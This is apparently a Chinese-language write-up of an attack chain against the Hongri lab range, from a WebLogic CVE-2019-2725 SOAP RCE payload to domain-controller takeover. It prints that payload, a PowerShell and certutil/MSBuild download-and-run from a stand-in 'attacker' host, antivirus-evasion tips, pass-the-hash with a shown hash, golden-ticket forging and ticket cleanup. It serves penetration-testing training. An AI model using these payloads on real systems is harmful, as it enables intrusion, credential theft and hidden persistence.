红日靶场(二)实战复盘:从WebLogic漏洞到域控提权的完整攻击链分析
红日靶场深度实战:从WebLogic漏洞到域控提权的攻击链艺术
当安全从业者从靶场训练迈向真实攻防对抗时,最关键的差异往往不在于工具使用熟练度,而在于面对复杂环境时的战术决策能力。红日靶场作为国内知名的内网渗透训练平台,其精心设计的二层网络拓扑(外网Web服务器同时充当内网网关)模拟了企业常见的基础架构弱点。本文将跳出常规的步骤复现模式,通过五个战术维度拆解攻击链中的关键转折点。
1. 漏洞选择的博弈论:为何是CVE-2019-2725?
在扫描发现WebLogic 7001端口开放时,渗透测试者通常会面临多个漏洞选择。通过对比分析常见WebLogic漏洞的实战价值,我们可以建立更科学的漏洞利用优先级评估体系:
| 漏洞编号 | 利用复杂度 | 默认配置 | 防护绕过难度 | 后续利用链扩展性 |
|---|---|---|---|---|
| CVE-2019-2725 | 低 | 开启 | 中等 | 高(直接RCE) |
| CVE-2017-3506 | 中 | 部分开启 | 高 | 中(需二次利用) |
| CVE-2017-10271 | 低 | 开启 | 极高 | 低 |
关键决策点:选择CVE-2019-2725的核心优势在于其异步通信服务(_async/AsyncResponseService)的默认启用特性,这避免了需要认证的复杂场景。实战中通过构造特殊SOAP报文触发XML反序列化:
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.44.80:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>cmd.exe</string></void> <void index="1"><string>/c</string></void> <void index="2"><string>whoami > C:\result.txt</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> </soapenv:Envelope>2. 终端防护的破局思维:动态免杀的进阶技巧
当常规的静态免杀马被360动态检测拦截时,成熟的攻击者会转向更隐蔽的执行方式。以下是三种经过验证的绕过方案:
内存加载技术:通过反射DLL注入实现无文件驻留
$bytes = (New-Object Net.WebClient).DownloadData('http://attacker/beacon.dll') $assembly = [System.Reflection.Assembly]::Load($bytes) $entryPoint = $assembly.GetType('Beacon.Program').GetMethod('Main') $entryPoint.Invoke($null, @())合法进程劫持:利用白名单进程加载恶意代码
- 通过Process Hollowing注入到svchost.exe
- 使用AppDomainManager劫持.NET应用程序
生活化攻击面:
- 伪装成文档图标(.scr/.hta)
- 利用计划任务实现阶段性激活
战术要点:在靶场环境中发现,通过certutil.exe的编码下载功能配合MSBuild的XML内联任务,能有效绕过对PowerShell的监控:
certutil -urlcache -split -f http://attacker/malicious.xml payload.xml C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml3. 横向移动的路径优化:协议选择的胜负手
从Web服务器(10.10.10.80)向域控(10.10.10.10)推进时,攻击者需要评估不同协议的隐蔽性和成功率。通过对比实验数据发现:
| 攻击方式 | 成功率 | 流量特征 | 依赖条件 | 防护规避能力 |
|---|---|---|---|---|
| MS17-010 | 30% | 显著 | 未打补丁 | 低 |
| Psexec | 85% | 中等 | 管理员凭据 | 中 |
| WMI | 70% | 隐蔽 | 防火墙放行135端口 | 高 |
| 计划任务 | 60% | 分散 | 445端口开放 | 中 |
实战选择:当MS17-010利用失败时,转向Psexec的核心优势在于:
- 可复用已获取的NTLM哈希(如通过mimikatz获取的Administrator:123qwe.)
- 执行过程产生的日志可被后续清除
- 支持多种payload传递方式(服务DLL/反射注入)
# 使用Impacket工具集进行哈希传递 python3 psexec.py -hashes :579da618cfbfa85247acf1f800a280a4 de1ay/administrator@10.10.10.104. 权限维持的隐蔽艺术:黄金票据的实战细节
获得域控权限后,传统的后门方式容易被常规检测发现。黄金票据(Golden Ticket)之所以成为高级持久化手段,关键在于其利用Kerberos协议的设计特性:
核心要素获取:
kerberos::golden /user:fakeuser /domain:de1ay.local /sid:S-1-5-21-1385844836-3290941523-682003330 /krbtgt:579da618cfbfa85247acf1f800a280a4 /ptt- SID通过
whoami /all获取 - krbtgt哈希来自域控的NTDS.dit提取
- SID通过
隐蔽性增强技巧:
- 设置合理的票据有效期(默认10年过长,建议设为3个月)
- 避免使用域管理员账号,创建普通用户伪造票据
- 配合Silver Ticket针对特定服务(如CIFS)
检测规避:
# 清除内存中的票据 klist purge # 使用非对称加密存储票据 certutil -encode ticket.kirbi ticket.b64
5. 攻击链的战术升华:从操作到思维
回顾整个渗透过程,真正的技术分水岭出现在三个决策点:
WebLogic漏洞利用后的入口选择:
- 常规webshell上传 vs 内存马注入
- 直接反弹shell vs 阶梯式代理搭建
内网信息收集的维度设计:
# 获取域策略信息(判断密码复杂度要求) Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess # 查找跨域信任关系 Get-DomainTrust -API横向移动的协议切换时机:
- 当445端口被封禁时转向5985(WinRM)
- 利用DNS隧道进行C2通信
- 通过LLMNR/NBT-NS投毒诱导凭证
在真实攻防中,攻击者往往需要在12小时内完成从外网突破到域控占领的全流程。红日靶场的价值正在于其逼真模拟了这种时间压力下的技术决策场景——那些看似偶然的成功背后,实则是攻击者对协议特性、系统机制和防御策略的深度理解。